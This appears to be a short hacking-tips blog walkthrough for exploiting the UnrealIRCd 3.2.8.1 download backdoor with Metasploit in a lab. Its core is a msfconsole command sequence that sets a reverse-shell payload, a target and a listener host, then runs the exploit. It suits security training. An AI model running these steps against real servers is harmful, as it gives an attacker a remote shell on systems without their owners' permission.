Attack Unreal IRC Server – This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present…

Attack Unreal IRC Server

UnrealIRCD 3.2.8.1 Backdoor Command Execution

Attack Unreal IRC Serve – This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive.

This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 172.16.74.129
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 172.16.74.128
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
whoami
shell
bash

https://www.unrealircd.org/

Ultimate Guide to Attack Linux DistCC Daemon Command Execution Port 3632

Oh hi there 👋 It’s nice to meet you.

Sign up to receive awesome content in your inbox, every month.

Read our privacy policy for more info.

PopLAbSec_Logo

Hacking tips!

We don’t spam! Read our privacy policy for more info.